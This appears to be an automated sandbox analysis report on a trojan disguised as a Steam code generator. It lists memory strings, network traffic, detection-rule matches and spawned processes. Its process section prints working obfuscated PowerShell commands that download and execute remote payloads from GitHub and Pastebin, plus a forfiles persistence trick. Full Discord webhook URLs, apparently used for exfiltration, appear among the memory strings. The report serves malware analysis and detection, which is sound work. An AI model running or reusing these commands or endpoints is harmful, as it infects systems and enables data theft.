Source: powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discor
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000004.00000002.2376546046.000001662B951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BD2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BD17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D1840FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D1840E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C85F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 00000011.00000002.2874987774.000001D184C70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB81E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kN
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.p
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/B:
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2188026202.0000020C72AAD000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt
Source: steamcodegenerator.exeString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt%pinvalid
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtE
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtF
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtiR
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtk
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtl
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtll
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2392788423.000001663B9CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2392788423.000001663BB02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2376546046.000001662D22A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/2
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/GP
Source: steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A62000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398727720.0000020C74620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-
Source: steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/t
Source: powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB803C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB81649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
Source: powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C76E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C74A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comp
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49797 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49900 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49911 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49944 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49952 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49997 version: TLS 1.2

System Summary

barindex
Source: amsi64_420.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_5576.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4372, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 420, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txt, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000020C7473819F NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0000020C7473819F
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0522300_2_00007FF71C052230
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C07354C0_2_00007FF71C07354C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C052DE00_2_00007FF71C052DE0
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C060FD40_2_00007FF71C060FD4
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C06000C0_2_00007FF71C06000C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C06980A0_2_00007FF71C06980A
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C06F0080_2_00007FF71C06F008
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C07203C0_2_00007FF71C07203C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C06408C0_2_00007FF71C06408C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0649100_2_00007FF71C064910
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0690FC0_2_00007FF71C0690FC
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0669740_2_00007FF71C066974
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0621E80_2_00007FF71C0621E8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0602100_2_00007FF71C060210
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C074B840_2_00007FF71C074B84
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C074C0B0_2_00007FF71C074C0B
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0604140_2_00007FF71C060414
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C067C3C0_2_00007FF71C067C3C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0704780_2_00007FF71C070478
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000020C7473819F0_2_0000020C7473819F
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000020C74737D6F0_2_0000020C74737D6F
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000020C74736AB70_2_0000020C74736AB7
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000020C74738C530_2_0000020C74738C53
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000020C74771F000_2_0000020C74771F00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347816FA4_2_00007FFD347816FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347816D14_2_00007FFD347816D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3477D9A26_2_00007FFD3477D9A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3477CBF66_2_00007FFD3477CBF6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34776C9C6_2_00007FFD34776C9C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34775DF26_2_00007FFD34775DF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347725ED6_2_00007FFD347725ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34776DFB6_2_00007FFD34776DFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34776EFA6_2_00007FFD34776EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34775FFA6_2_00007FFD34775FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347717736_2_00007FFD34771773
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347788FA6_2_00007FFD347788FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34770C4A6_2_00007FFD34770C4A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3477C71213_2_00007FFD3477C712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3477B96613_2_00007FFD3477B966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD34777E7813_2_00007FFD34777E78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD347726D313_2_00007FFD347726D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3477490313_2_00007FFD34774903
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3477D1B113_2_00007FFD3477D1B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3477B44013_2_00007FFD3477B440
Source: amsi64_420.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_5576.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: powershell.exe PID: 4372, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 420, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txt, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal96.troj.evad.winEXE@21/17@5/5
Source: C:\Users\user\Desktop\steamcodegenerator.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txtJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xys4rqtb.i0t.ps1Jump to behavior
Source: steamcodegenerator.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: steamcodegenerator.exeReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Users\user\Desktop\steamcodegenerator.exe "C:\Users\user\Desktop\steamcodegenerator.exe"
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
